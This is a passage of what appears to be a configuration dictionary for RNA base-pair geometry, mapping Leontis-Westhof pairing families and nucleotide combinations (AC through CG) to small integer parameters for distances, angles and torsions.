"cSW_AC_tips_distance":6, "cSW_AC_C1'-B1-B1pair":2, "cSW_AC_B1-B1pair-C1'pair":2, "cSW_AC_C4'-C1'-B1-B1pair":2, "cSW_AC_B1-B1pair-C1'pair-C4'pair":2, "cSW_AC_alpha_1":3, "cSW_AC_alpha_2":2, "cSW_AC_dB1":2, "cSW_AC_dB2":3,
"tSW_AC_tips_distance":5, "tSW_AC_C1'-B1-B1pair":1, "tSW_AC_B1-B1pair-C1'pair":2, "tSW_AC_C4'-C1'-B1-B1pair":1, "tSW_AC_B1-B1pair-C1'pair-C4'pair":2, "tSW_AC_alpha_1":1, "tSW_AC_alpha_2":2, "tSW_AC_dB1":2, "tSW_AC_dB2":3,
"cHH_AC_tips_distance":5, "cHH_AC_C1'-B1-B1pair":2, "cHH_AC_B1-B1pair-C1'pair":2, "cHH_AC_C4'-C1'-B1-B1pair":2, "cHH_AC_B1-B1pair-C1'pair-C4'pair":1, "cHH_AC_alpha_1":3, "cHH_AC_alpha_2":3, "cHH_AC_dB1":3, "cHH_AC_dB2":4,
"tHH_AC_tips_distance":4, "tHH_AC_C1'-B1-B1pair":1, "tHH_AC_B1-B1pair-C1'pair":2, "tHH_AC_C4'-C1'-B1-B1pair":2, "tHH_AC_B1-B1pair-C1'pair-C4'pair":3, "tHH_AC_alpha_1":2, "tHH_AC_alpha_2":2, "tHH_AC_dB1":4, "tHH_AC_dB2":3,
"cSH_AC_tips_distance":3, "cSH_AC_C1'-B1-B1pair":1, "cSH_AC_B1-B1pair-C1'pair":3, "cSH_AC_C4'-C1'-B1-B1pair":1, "cSH_AC_B1-B1pair-C1'pair-C4'pair":2, "cSH_AC_alpha_1":1, "cSH_AC_alpha_2":1, "cSH_AC_dB1":2, "cSH_AC_dB2":6,
"tSH_AC_tips_distance":8, "tSH_AC_C1'-B1-B1pair":3, "tSH_AC_B1-B1pair-C1'pair":2, "tSH_AC_C4'-C1'-B1-B1pair":1, "tSH_AC_B1-B1pair-C1'pair-C4'pair":2, "tSH_AC_alpha_1":2, "tSH_AC_alpha_2":3, "tSH_AC_dB1":1, "tSH_AC_dB2":2,
"cHS_AC_tips_distance":4, "cHS_AC_C1'-B1-B1pair":1, "cHS_AC_B1-B1pair-C1'pair":1, "cHS_AC_C4'-C1'-B1-B1pair":2, "cHS_AC_B1-B1pair-C1'pair-C4'pair":1, "cHS_AC_alpha_1":1, "cHS_AC_alpha_2":1, "cHS_AC_dB1":3, "cHS_AC_dB2":2,
"tHS_AC_tips_distance":8, "tHS_AC_C1'-B1-B1pair":1, "tHS_AC_B1-B1pair-C1'pair":2, "tHS_AC_C4'-C1'-B1-B1pair":2, "tHS_AC_B1-B1pair-C1'pair-C4'pair":2, "tHS_AC_alpha_1":1, "tHS_AC_alpha_2":1, "tHS_AC_dB1":1, "tHS_AC_dB2":1,
"cSS_AC_tips_distance":2, "cSS_AC_C1'-B1-B1pair":2, "cSS_AC_B1-B1pair-C1'pair":2, "cSS_AC_C4'-C1'-B1-B1pair":1, "cSS_AC_B1-B1pair-C1'pair-C4'pair":1, "cSS_AC_alpha_1":2, "cSS_AC_alpha_2":1, "cSS_AC_dB1":1, "cSS_AC_dB2":5,
"tSS_AC_tips_distance":5, "tSS_AC_C1'-B1-B1pair":2, "tSS_AC_B1-B1pair-C1'pair":2, "tSS_AC_C4'-C1'-B1-B1pair":1, "tSS_AC_B1-B1pair-C1'pair-C4'pair":2, "tSS_AC_alpha_1":2, "tSS_AC_alpha_2":2, "tSS_AC_dB1":3, "tSS_AC_dB2":5,
"cWW_AG_tips_distance":3, "cWW_AG_C1'-B1-B1pair":1, "cWW_AG_B1-B1pair-C1'pair":1, "cWW_AG_C4'-C1'-B1-B1pair":2, "cWW_AG_B1-B1pair-C1'pair-C4'pair":2, "cWW_AG_alpha_1":1, "cWW_AG_alpha_2":1, "cWW_AG_dB1":1, "cWW_AG_dB2":1,
"tWW_AG_tips_distance":5, "tWW_AG_C1'-B1-B1pair":1, "tWW_AG_B1-B1pair-C1'pair":1, "tWW_AG_C4'-C1'-B1-B1pair":2, "tWW_AG_B1-B1pair-C1'pair-C4'pair":2, "tWW_AG_alpha_1":2, "tWW_AG_alpha_2":2, "tWW_AG_dB1":2, "tWW_AG_dB2":3,
"cWH_AG_tips_distance":4, "cWH_AG_C1'-B1-B1pair":1, "cWH_AG_B1-B1pair-C1'pair":1, "cWH_AG_C4'-C1'-B1-B1pair":2, "cWH_AG_B1-B1pair-C1'pair-C4'pair":2, "cWH_AG_alpha_1":3, "cWH_AG_alpha_2":1, "cWH_AG_dB1":2, "cWH_AG_dB2":1,
"tWH_AG_tips_distance":3, "tWH_AG_C1'-B1-B1pair":1, "tWH_AG_B1-B1pair-C1'pair":1, "tWH_AG_C4'-C1'-B1-B1pair":2, "tWH_AG_B1-B1pair-C1'pair-C4'pair":2, "tWH_AG_alpha_1":2, "tWH_AG_alpha_2":1, "tWH_AG_dB1":2, "tWH_AG_dB2":1,
"cHW_AG_tips_distance":2, "cHW_AG_C1'-B1-B1pair":2, "cHW_AG_B1-B1pair-C1'pair":1, "cHW_AG_C4'-C1'-B1-B1pair":2, "cHW_AG_B1-B1pair-C1'pair-C4'pair":1, "cHW_AG_alpha_1":1, "cHW_AG_alpha_2":2, "cHW_AG_dB1":2, "cHW_AG_dB2":2,
"tHW_AG_tips_distance":3, "tHW_AG_C1'-B1-B1pair":2, "tHW_AG_B1-B1pair-C1'pair":2, "tHW_AG_C4'-C1'-B1-B1pair":2, "tHW_AG_B1-B1pair-C1'pair-C4'pair":2, "tHW_AG_alpha_1":2, "tHW_AG_alpha_2":2, "tHW_AG_dB1":2, "tHW_AG_dB2":2,
"cWS_AG_tips_distance":1, "cWS_AG_C1'-B1-B1pair":3, "cWS_AG_B1-B1pair-C1'pair":1, "cWS_AG_C4'-C1'-B1-B1pair":1, "cWS_AG_B1-B1pair-C1'pair-C4'pair":1, "cWS_AG_alpha_1":2, "cWS_AG_alpha_2":2, "cWS_AG_dB1":2, "cWS_AG_dB2":1,
"tWS_AG_tips_distance":6, "tWS_AG_C1'-B1-B1pair":1, "tWS_AG_B1-B1pair-C1'pair":2, "tWS_AG_C4'-C1'-B1-B1pair":2, "tWS_AG_B1-B1pair-C1'pair-C4'pair":1, "tWS_AG_alpha_1":2, "tWS_AG_alpha_2":2, "tWS_AG_dB1":1, "tWS_AG_dB2":3,
"cSW_AG_tips_distance":4, "cSW_AG_C1'-B1-B1pair":1, "cSW_AG_B1-B1pair-C1'pair":2, "cSW_AG_C4'-C1'-B1-B1pair":1, "cSW_AG_B1-B1pair-C1'pair-C4'pair":2, "cSW_AG_alpha_1":1, "cSW_AG_alpha_2":2, "cSW_AG_dB1":3, "cSW_AG_dB2":1,
"tSW_AG_tips_distance":7, "tSW_AG_C1'-B1-B1pair":3, "tSW_AG_B1-B1pair-C1'pair":2, "tSW_AG_C4'-C1'-B1-B1pair":2, "tSW_AG_B1-B1pair-C1'pair-C4'pair":2, "tSW_AG_alpha_1":2, "tSW_AG_alpha_2":2, "tSW_AG_dB1":3, "tSW_AG_dB2":3,
"cHH_AG_tips_distance":2, "cHH_AG_C1'-B1-B1pair":2, "cHH_AG_B1-B1pair-C1'pair":4, "cHH_AG_C4'-C1'-B1-B1pair":3, "cHH_AG_B1-B1pair-C1'pair-C4'pair":2, "cHH_AG_alpha_1":2, "cHH_AG_alpha_2":3, "cHH_AG_dB1":1, "cHH_AG_dB2":2,
"tHH_AG_tips_distance":8, "tHH_AG_C1'-B1-B1pair":3, "tHH_AG_B1-B1pair-C1'pair":3, "tHH_AG_C4'-C1'-B1-B1pair":3, "tHH_AG_B1-B1pair-C1'pair-C4'pair":2, "tHH_AG_alpha_1":3, "tHH_AG_alpha_2":3, "tHH_AG_dB1":1, "tHH_AG_dB2":2,
"cSH_AG_tips_distance":5, "cSH_AG_C1'-B1-B1pair":2, "cSH_AG_B1-B1pair-C1'pair":2, "cSH_AG_C4'-C1'-B1-B1pair":2, "cSH_AG_B1-B1pair-C1'pair-C4'pair":2, "cSH_AG_alpha_1":3, "cSH_AG_alpha_2":1, "cSH_AG_dB1":1, "cSH_AG_dB2":3,
"tSH_AG_tips_distance":5, "tSH_AG_C1'-B1-B1pair":2, "tSH_AG_B1-B1pair-C1'pair":2, "tSH_AG_C4'-C1'-B1-B1pair":2, "tSH_AG_B1-B1pair-C1'pair-C4'pair":3, "tSH_AG_alpha_1":2, "tSH_AG_alpha_2":4, "tSH_AG_dB1":3, "tSH_AG_dB2":2,
"cHS_AG_tips_distance":1, "cHS_AG_C1'-B1-B1pair":3, "cHS_AG_B1-B1pair-C1'pair":1, "cHS_AG_C4'-C1'-B1-B1pair":3, "cHS_AG_B1-B1pair-C1'pair-C4'pair":1, "cHS_AG_alpha_1":2, "cHS_AG_alpha_2":3, "cHS_AG_dB1":1, "cHS_AG_dB2":2,
"tHS_AG_tips_distance":6, "tHS_AG_C1'-B1-B1pair":1, "tHS_AG_B1-B1pair-C1'pair":2, "tHS_AG_C4'-C1'-B1-B1pair":2, "tHS_AG_B1-B1pair-C1'pair-C4'pair":2, "tHS_AG_alpha_1":1, "tHS_AG_alpha_2":2, "tHS_AG_dB1":2, "tHS_AG_dB2":1,
"cSS_AG_tips_distance":2, "cSS_AG_C1'-B1-B1pair":2, "cSS_AG_B1-B1pair-C1'pair":2, "cSS_AG_C4'-C1'-B1-B1pair":2, "cSS_AG_B1-B1pair-C1'pair-C4'pair":1, "cSS_AG_alpha_1":2, "cSS_AG_alpha_2":1, "cSS_AG_dB1":2, "cSS_AG_dB2":4,
"tSS_AG_tips_distance":4, "tSS_AG_C1'-B1-B1pair":3, "tSS_AG_B1-B1pair-C1'pair":1, "tSS_AG_C4'-C1'-B1-B1pair":2, "tSS_AG_B1-B1pair-C1'pair-C4'pair":1, "tSS_AG_alpha_1":2, "tSS_AG_alpha_2":1, "tSS_AG_dB1":2, "tSS_AG_dB2":4,
"cWW_AU_tips_distance":3, "cWW_AU_C1'-B1-B1pair":1, "cWW_AU_B1-B1pair-C1'pair":2, "cWW_AU_C4'-C1'-B1-B1pair":3, "cWW_AU_B1-B1pair-C1'pair-C4'pair":2, "cWW_AU_alpha_1":3, "cWW_AU_alpha_2":1, "cWW_AU_dB1":4, "cWW_AU_dB2":2,
"tWW_AU_tips_distance":3, "tWW_AU_C1'-B1-B1pair":3, "tWW_AU_B1-B1pair-C1'pair":3, "tWW_AU_C4'-C1'-B1-B1pair":2, "tWW_AU_B1-B1pair-C1'pair-C4'pair":2, "tWW_AU_alpha_1":3, "tWW_AU_alpha_2":2, "tWW_AU_dB1":3, "tWW_AU_dB2":2,
"cWH_AU_tips_distance":5, "cWH_AU_C1'-B1-B1pair":2, "cWH_AU_B1-B1pair-C1'pair":2, "cWH_AU_C4'-C1'-B1-B1pair":2, "cWH_AU_B1-B1pair-C1'pair-C4'pair":2, "cWH_AU_alpha_1":1, "cWH_AU_alpha_2":3, "cWH_AU_dB1":3, "cWH_AU_dB2":3,
"tWH_AU_tips_distance":6, "tWH_AU_C1'-B1-B1pair":1, "tWH_AU_B1-B1pair-C1'pair":3, "tWH_AU_C4'-C1'-B1-B1pair":2, "tWH_AU_B1-B1pair-C1'pair-C4'pair":2, "tWH_AU_alpha_1":2, "tWH_AU_alpha_2":2, "tWH_AU_dB1":1, "tWH_AU_dB2":3,
"cHW_AU_tips_distance":3, "cHW_AU_C1'-B1-B1pair":3, "cHW_AU_B1-B1pair-C1'pair":3, "cHW_AU_C4'-C1'-B1-B1pair":2, "cHW_AU_B1-B1pair-C1'pair-C4'pair":2, "cHW_AU_alpha_1":1, "cHW_AU_alpha_2":2, "cHW_AU_dB1":2, "cHW_AU_dB2":2,
"tHW_AU_tips_distance":3, "tHW_AU_C1'-B1-B1pair":2, "tHW_AU_B1-B1pair-C1'pair":2, "tHW_AU_C4'-C1'-B1-B1pair":2, "tHW_AU_B1-B1pair-C1'pair-C4'pair":2, "tHW_AU_alpha_1":2, "tHW_AU_alpha_2":1, "tHW_AU_dB1":1, "tHW_AU_dB2":4,
"cWS_AU_tips_distance":2, "cWS_AU_C1'-B1-B1pair":1, "cWS_AU_B1-B1pair-C1'pair":1, "cWS_AU_C4'-C1'-B1-B1pair":2, "cWS_AU_B1-B1pair-C1'pair-C4'pair":1, "cWS_AU_alpha_1":2, "cWS_AU_alpha_2":2, "cWS_AU_dB1":2, "cWS_AU_dB2":5,
"tWS_AU_tips_distance":2, "tWS_AU_C1'-B1-B1pair":2, "tWS_AU_B1-B1pair-C1'pair":2, "tWS_AU_C4'-C1'-B1-B1pair":2, "tWS_AU_B1-B1pair-C1'pair-C4'pair":1, "tWS_AU_alpha_1":2, "tWS_AU_alpha_2":2, "tWS_AU_dB1":3, "tWS_AU_dB2":4,
"cSW_AU_tips_distance":2, "cSW_AU_C1'-B1-B1pair":3, "cSW_AU_B1-B1pair-C1'pair":2, "cSW_AU_C4'-C1'-B1-B1pair":2, "cSW_AU_B1-B1pair-C1'pair-C4'pair":2, "cSW_AU_alpha_1":3, "cSW_AU_alpha_2":2, "cSW_AU_dB1":2, "cSW_AU_dB2":3,
"tSW_AU_tips_distance":3, "tSW_AU_C1'-B1-B1pair":2, "tSW_AU_B1-B1pair-C1'pair":3, "tSW_AU_C4'-C1'-B1-B1pair":3, "tSW_AU_B1-B1pair-C1'pair-C4'pair":2, "tSW_AU_alpha_1":2, "tSW_AU_alpha_2":1, "tSW_AU_dB1":3, "tSW_AU_dB2":4,
"cHH_AU_tips_distance":6, "cHH_AU_C1'-B1-B1pair":2, "cHH_AU_B1-B1pair-C1'pair":1, "cHH_AU_C4'-C1'-B1-B1pair":2, "cHH_AU_B1-B1pair-C1'pair-C4'pair":1, "cHH_AU_alpha_1":2, "cHH_AU_alpha_2":2, "cHH_AU_dB1":1, "cHH_AU_dB2":2,
"tHH_AU_tips_distance":8, "tHH_AU_C1'-B1-B1pair":3, "tHH_AU_B1-B1pair-C1'pair":3, "tHH_AU_C4'-C1'-B1-B1pair":3, "tHH_AU_B1-B1pair-C1'pair-C4'pair":2, "tHH_AU_alpha_1":3, "tHH_AU_alpha_2":3, "tHH_AU_dB1":1, "tHH_AU_dB2":3,
"cSH_AU_tips_distance":5, "cSH_AU_C1'-B1-B1pair":1, "cSH_AU_B1-B1pair-C1'pair":3, "cSH_AU_C4'-C1'-B1-B1pair":3, "cSH_AU_B1-B1pair-C1'pair-C4'pair":2, "cSH_AU_alpha_1":2, "cSH_AU_alpha_2":1, "cSH_AU_dB1":4, "cSH_AU_dB2":4,
"tSH_AU_tips_distance":5, "tSH_AU_C1'-B1-B1pair":3, "tSH_AU_B1-B1pair-C1'pair":1, "tSH_AU_C4'-C1'-B1-B1pair":1, "tSH_AU_B1-B1pair-C1'pair-C4'pair":2, "tSH_AU_alpha_1":3, "tSH_AU_alpha_2":3, "tSH_AU_dB1":3, "tSH_AU_dB2":4,
"cHS_AU_tips_distance":2, "cHS_AU_C1'-B1-B1pair":3, "cHS_AU_B1-B1pair-C1'pair":1, "cHS_AU_C4'-C1'-B1-B1pair":2, "cHS_AU_B1-B1pair-C1'pair-C4'pair":2, "cHS_AU_alpha_1":2, "cHS_AU_alpha_2":2, "cHS_AU_dB1":1, "cHS_AU_dB2":3,
"tHS_AU_tips_distance":2, "tHS_AU_C1'-B1-B1pair":2, "tHS_AU_B1-B1pair-C1'pair":2, "tHS_AU_C4'-C1'-B1-B1pair":2, "tHS_AU_B1-B1pair-C1'pair-C4'pair":3, "tHS_AU_alpha_1":3, "tHS_AU_alpha_2":2, "tHS_AU_dB1":3, "tHS_AU_dB2":3,
"cSS_AU_tips_distance":3, "cSS_AU_C1'-B1-B1pair":2, "cSS_AU_B1-B1pair-C1'pair":2, "cSS_AU_C4'-C1'-B1-B1pair":1, "cSS_AU_B1-B1pair-C1'pair-C4'pair":2, "cSS_AU_alpha_1":3, "cSS_AU_alpha_2":2, "cSS_AU_dB1":1, "cSS_AU_dB2":4,
"tSS_AU_tips_distance":5, "tSS_AU_C1'-B1-B1pair":2, "tSS_AU_B1-B1pair-C1'pair":1, "tSS_AU_C4'-C1'-B1-B1pair":3, "tSS_AU_B1-B1pair-C1'pair-C4'pair":2, "tSS_AU_alpha_1":2, "tSS_AU_alpha_2":3, "tSS_AU_dB1":3, "tSS_AU_dB2":8,
"cWW_CA_tips_distance":2, "cWW_CA_C1'-B1-B1pair":2, "cWW_CA_B1-B1pair-C1'pair":1, "cWW_CA_C4'-C1'-B1-B1pair":2, "cWW_CA_B1-B1pair-C1'pair-C4'pair":2, "cWW_CA_alpha_1":1, "cWW_CA_alpha_2":2, "cWW_CA_dB1":1, "cWW_CA_dB2":1,
"tWW_CA_tips_distance":4, "tWW_CA_C1'-B1-B1pair":2, "tWW_CA_B1-B1pair-C1'pair":2, "tWW_CA_C4'-C1'-B1-B1pair":3, "tWW_CA_B1-B1pair-C1'pair-C4'pair":2, "tWW_CA_alpha_1":2, "tWW_CA_alpha_2":1, "tWW_CA_dB1":4, "tWW_CA_dB2":2,
"cWH_CA_tips_distance":3, "cWH_CA_C1'-B1-B1pair":3, "cWH_CA_B1-B1pair-C1'pair":2, "cWH_CA_C4'-C1'-B1-B1pair":2, "cWH_CA_B1-B1pair-C1'pair-C4'pair":3, "cWH_CA_alpha_1":3, "cWH_CA_alpha_2":2, "cWH_CA_dB1":5, "cWH_CA_dB2":2,
"tWH_CA_tips_distance":5, "tWH_CA_C1'-B1-B1pair":1, "tWH_CA_B1-B1pair-C1'pair":1, "tWH_CA_C4'-C1'-B1-B1pair":2, "tWH_CA_B1-B1pair-C1'pair-C4'pair":2, "tWH_CA_alpha_1":3, "tWH_CA_alpha_2":1, "tWH_CA_dB1":3, "tWH_CA_dB2":2,
"cHW_CA_tips_distance":2, "cHW_CA_C1'-B1-B1pair":2, "cHW_CA_B1-B1pair-C1'pair":2, "cHW_CA_C4'-C1'-B1-B1pair":2, "cHW_CA_B1-B1pair-C1'pair-C4'pair":2, "cHW_CA_alpha_1":2, "cHW_CA_alpha_2":2, "cHW_CA_dB1":4, "cHW_CA_dB2":2,
"tHW_CA_tips_distance":2, "tHW_CA_C1'-B1-B1pair":2, "tHW_CA_B1-B1pair-C1'pair":2, "tHW_CA_C4'-C1'-B1-B1pair":2, "tHW_CA_B1-B1pair-C1'pair-C4'pair":2, "tHW_CA_alpha_1":2, "tHW_CA_alpha_2":2, "tHW_CA_dB1":6, "tHW_CA_dB2":2,
"cWS_CA_tips_distance":2, "cWS_CA_C1'-B1-B1pair":2, "cWS_CA_B1-B1pair-C1'pair":2, "cWS_CA_C4'-C1'-B1-B1pair":2, "cWS_CA_B1-B1pair-C1'pair-C4'pair":1, "cWS_CA_alpha_1":2, "cWS_CA_alpha_2":2, "cWS_CA_dB1":4, "cWS_CA_dB2":2,
"tWS_CA_tips_distance":5, "tWS_CA_C1'-B1-B1pair":3, "tWS_CA_B1-B1pair-C1'pair":1, "tWS_CA_C4'-C1'-B1-B1pair":3, "tWS_CA_B1-B1pair-C1'pair-C4'pair":2, "tWS_CA_alpha_1":3, "tWS_CA_alpha_2":1, "tWS_CA_dB1":1, "tWS_CA_dB2":1,
"cSW_CA_tips_distance":1, "cSW_CA_C1'-B1-B1pair":1, "cSW_CA_B1-B1pair-C1'pair":1, "cSW_CA_C4'-C1'-B1-B1pair":1, "cSW_CA_B1-B1pair-C1'pair-C4'pair":2, "cSW_CA_alpha_1":1, "cSW_CA_alpha_2":3, "cSW_CA_dB1":1, "cSW_CA_dB2":1,
"tSW_CA_tips_distance":3, "tSW_CA_C1'-B1-B1pair":2, "tSW_CA_B1-B1pair-C1'pair":2, "tSW_CA_C4'-C1'-B1-B1pair":1, "tSW_CA_B1-B1pair-C1'pair-C4'pair":1, "tSW_CA_alpha_1":2, "tSW_CA_alpha_2":3, "tSW_CA_dB1":3, "tSW_CA_dB2":1,
"cHH_CA_tips_distance":5, "cHH_CA_C1'-B1-B1pair":2, "cHH_CA_B1-B1pair-C1'pair":1, "cHH_CA_C4'-C1'-B1-B1pair":3, "cHH_CA_B1-B1pair-C1'pair-C4'pair":1, "cHH_CA_alpha_1":2, "cHH_CA_alpha_2":1, "cHH_CA_dB1":1, "cHH_CA_dB2":2,
"tHH_CA_tips_distance":1, "tHH_CA_C1'-B1-B1pair":2, "tHH_CA_B1-B1pair-C1'pair":2, "tHH_CA_C4'-C1'-B1-B1pair":3, "tHH_CA_B1-B1pair-C1'pair-C4'pair":3, "tHH_CA_alpha_1":2, "tHH_CA_alpha_2":1, "tHH_CA_dB1":3, "tHH_CA_dB2":5,
"cSH_CA_tips_distance":3, "cSH_CA_C1'-B1-B1pair":1, "cSH_CA_B1-B1pair-C1'pair":3, "cSH_CA_C4'-C1'-B1-B1pair":2, "cSH_CA_B1-B1pair-C1'pair-C4'pair":1, "cSH_CA_alpha_1":1, "cSH_CA_alpha_2":1, "cSH_CA_dB1":2, "cSH_CA_dB2":3,
"tSH_CA_tips_distance":2, "tSH_CA_C1'-B1-B1pair":1, "tSH_CA_B1-B1pair-C1'pair":2, "tSH_CA_C4'-C1'-B1-B1pair":2, "tSH_CA_B1-B1pair-C1'pair-C4'pair":2, "tSH_CA_alpha_1":3, "tSH_CA_alpha_2":2, "tSH_CA_dB1":6, "tSH_CA_dB2":4,
"cHS_CA_tips_distance":2, "cHS_CA_C1'-B1-B1pair":2, "cHS_CA_B1-B1pair-C1'pair":2, "cHS_CA_C4'-C1'-B1-B1pair":1, "cHS_CA_B1-B1pair-C1'pair-C4'pair":1, "cHS_CA_alpha_1":1, "cHS_CA_alpha_2":2, "cHS_CA_dB1":2, "cHS_CA_dB2":2,
"tHS_CA_tips_distance":3, "tHS_CA_C1'-B1-B1pair":2, "tHS_CA_B1-B1pair-C1'pair":1, "tHS_CA_C4'-C1'-B1-B1pair":2, "tHS_CA_B1-B1pair-C1'pair-C4'pair":2, "tHS_CA_alpha_1":3, "tHS_CA_alpha_2":3, "tHS_CA_dB1":2, "tHS_CA_dB2":1,
"cSS_CA_tips_distance":7, "cSS_CA_C1'-B1-B1pair":2, "cSS_CA_B1-B1pair-C1'pair":2, "cSS_CA_C4'-C1'-B1-B1pair":1, "cSS_CA_B1-B1pair-C1'pair-C4'pair":1, "cSS_CA_alpha_1":3, "cSS_CA_alpha_2":3, "cSS_CA_dB1":3, "cSS_CA_dB2":1,
"tSS_CA_tips_distance":5, "tSS_CA_C1'-B1-B1pair":2, "tSS_CA_B1-B1pair-C1'pair":2, "tSS_CA_C4'-C1'-B1-B1pair":2, "tSS_CA_B1-B1pair-C1'pair-C4'pair":1, "tSS_CA_alpha_1":2, "tSS_CA_alpha_2":2, "tSS_CA_dB1":4, "tSS_CA_dB2":2,
"cWW_CC_tips_distance":3, "cWW_CC_C1'-B1-B1pair":1, "cWW_CC_B1-B1pair-C1'pair":1, "cWW_CC_C4'-C1'-B1-B1pair":2, "cWW_CC_B1-B1pair-C1'pair-C4'pair":2, "cWW_CC_alpha_1":1, "cWW_CC_alpha_2":2, "cWW_CC_dB1":2, "cWW_CC_dB2":2,
"tWW_CC_tips_distance":6, "tWW_CC_C1'-B1-B1pair":3, "tWW_CC_B1-B1pair-C1'pair":3, "tWW_CC_C4'-C1'-B1-B1pair":3, "tWW_CC_B1-B1pair-C1'pair-C4'pair":3, "tWW_CC_alpha_1":2, "tWW_CC_alpha_2":2, "tWW_CC_dB1":6, "tWW_CC_dB2":3,
"cWH_CC_tips_distance":4, "cWH_CC_C1'-B1-B1pair":2, "cWH_CC_B1-B1pair-C1'pair":2, "cWH_CC_C4'-C1'-B1-B1pair":2, "cWH_CC_B1-B1pair-C1'pair-C4'pair":1, "cWH_CC_alpha_1":1, "cWH_CC_alpha_2":3, "cWH_CC_dB1":3, "cWH_CC_dB2":2,
"tWH_CC_tips_distance":1, "tWH_CC_C1'-B1-B1pair":1, "tWH_CC_B1-B1pair-C1'pair":3, "tWH_CC_C4'-C1'-B1-B1pair":2, "tWH_CC_B1-B1pair-C1'pair-C4'pair":1, "tWH_CC_alpha_1":3, "tWH_CC_alpha_2":1, "tWH_CC_dB1":3, "tWH_CC_dB2":3,
"cHW_CC_tips_distance":4, "cHW_CC_C1'-B1-B1pair":3, "cHW_CC_B1-B1pair-C1'pair":2, "cHW_CC_C4'-C1'-B1-B1pair":1, "cHW_CC_B1-B1pair-C1'pair-C4'pair":2, "cHW_CC_alpha_1":2, "cHW_CC_alpha_2":2, "cHW_CC_dB1":2, "cHW_CC_dB2":3,
"tHW_CC_tips_distance":2, "tHW_CC_C1'-B1-B1pair":1, "tHW_CC_B1-B1pair-C1'pair":3, "tHW_CC_C4'-C1'-B1-B1pair":3, "tHW_CC_B1-B1pair-C1'pair-C4'pair":2, "tHW_CC_alpha_1":2, "tHW_CC_alpha_2":2, "tHW_CC_dB1":3, "tHW_CC_dB2":3,
"cWS_CC_tips_distance":3, "cWS_CC_C1'-B1-B1pair":2, "cWS_CC_B1-B1pair-C1'pair":2, "cWS_CC_C4'-C1'-B1-B1pair":1, "cWS_CC_B1-B1pair-C1'pair-C4'pair":1, "cWS_CC_alpha_1":2, "cWS_CC_alpha_2":3, "cWS_CC_dB1":2, "cWS_CC_dB2":1,
"tWS_CC_tips_distance":5, "tWS_CC_C1'-B1-B1pair":2, "tWS_CC_B1-B1pair-C1'pair":2, "tWS_CC_C4'-C1'-B1-B1pair":2, "tWS_CC_B1-B1pair-C1'pair-C4'pair":1, "tWS_CC_alpha_1":2, "tWS_CC_alpha_2":2, "tWS_CC_dB1":2, "tWS_CC_dB2":2,
"cSW_CC_tips_distance":3, "cSW_CC_C1'-B1-B1pair":2, "cSW_CC_B1-B1pair-C1'pair":2, "cSW_CC_C4'-C1'-B1-B1pair":2, "cSW_CC_B1-B1pair-C1'pair-C4'pair":1, "cSW_CC_alpha_1":3, "cSW_CC_alpha_2":2, "cSW_CC_dB1":2, "cSW_CC_dB2":2,
"tSW_CC_tips_distance":5, "tSW_CC_C1'-B1-B1pair":1, "tSW_CC_B1-B1pair-C1'pair":2, "tSW_CC_C4'-C1'-B1-B1pair":1, "tSW_CC_B1-B1pair-C1'pair-C4'pair":2, "tSW_CC_alpha_1":1, "tSW_CC_alpha_2":2, "tSW_CC_dB1":3, "tSW_CC_dB2":2,
"cHH_CC_tips_distance":5, "cHH_CC_C1'-B1-B1pair":1, "cHH_CC_B1-B1pair-C1'pair":1, "cHH_CC_C4'-C1'-B1-B1pair":1, "cHH_CC_B1-B1pair-C1'pair-C4'pair":1, "cHH_CC_alpha_1":2, "cHH_CC_alpha_2":1, "cHH_CC_dB1":7, "cHH_CC_dB2":7,
"tHH_CC_tips_distance":5, "tHH_CC_C1'-B1-B1pair":3, "tHH_CC_B1-B1pair-C1'pair":2, "tHH_CC_C4'-C1'-B1-B1pair":3, "tHH_CC_B1-B1pair-C1'pair-C4'pair":2, "tHH_CC_alpha_1":1, "tHH_CC_alpha_2":3, "tHH_CC_dB1":5, "tHH_CC_dB2":5,
"cSH_CC_tips_distance":3, "cSH_CC_C1'-B1-B1pair":2, "cSH_CC_B1-B1pair-C1'pair":2, "cSH_CC_C4'-C1'-B1-B1pair":2, "cSH_CC_B1-B1pair-C1'pair-C4'pair":2, "cSH_CC_alpha_1":3, "cSH_CC_alpha_2":2, "cSH_CC_dB1":5, "cSH_CC_dB2":2,
"tSH_CC_tips_distance":5, "tSH_CC_C1'-B1-B1pair":2, "tSH_CC_B1-B1pair-C1'pair":1, "tSH_CC_C4'-C1'-B1-B1pair":2, "tSH_CC_B1-B1pair-C1'pair-C4'pair":2, "tSH_CC_alpha_1":3, "tSH_CC_alpha_2":1, "tSH_CC_dB1":4, "tSH_CC_dB2":2,
"cHS_CC_tips_distance":3, "cHS_CC_C1'-B1-B1pair":2, "cHS_CC_B1-B1pair-C1'pair":2, "cHS_CC_C4'-C1'-B1-B1pair":2, "cHS_CC_B1-B1pair-C1'pair-C4'pair":2, "cHS_CC_alpha_1":3, "cHS_CC_alpha_2":2, "cHS_CC_dB1":2, "cHS_CC_dB2":2,
"tHS_CC_tips_distance":5, "tHS_CC_C1'-B1-B1pair":3, "tHS_CC_B1-B1pair-C1'pair":1, "tHS_CC_C4'-C1'-B1-B1pair":2, "tHS_CC_B1-B1pair-C1'pair-C4'pair":3, "tHS_CC_alpha_1":1, "tHS_CC_alpha_2":2, "tHS_CC_dB1":4, "tHS_CC_dB2":4,
"cSS_CC_tips_distance":5, "cSS_CC_C1'-B1-B1pair":2, "cSS_CC_B1-B1pair-C1'pair":2, "cSS_CC_C4'-C1'-B1-B1pair":2, "cSS_CC_B1-B1pair-C1'pair-C4'pair":1, "cSS_CC_alpha_1":1, "cSS_CC_alpha_2":3, "cSS_CC_dB1":1, "cSS_CC_dB2":3,
"tSS_CC_tips_distance":5, "tSS_CC_C1'-B1-B1pair":2, "tSS_CC_B1-B1pair-C1'pair":2, "tSS_CC_C4'-C1'-B1-B1pair":3, "tSS_CC_B1-B1pair-C1'pair-C4'pair":2, "tSS_CC_alpha_1":3, "tSS_CC_alpha_2":2, "tSS_CC_dB1":2, "tSS_CC_dB2":1,
"cWW_CG_tips_distance":5, "cWW_CG_C1'-B1-B1pair":2, "cWW_CG_B1-B1pair-C1'pair":1, "cWW_CG_C4'-C1'-B1-B1pair":2, "cWW_CG_B1-B1pair-C1'pair-C4'pair":2, "cWW_CG_alpha_1":2, "cWW_CG_alpha_2":3, "cWW_CG_dB1":2, "cWW_CG_dB2":2,
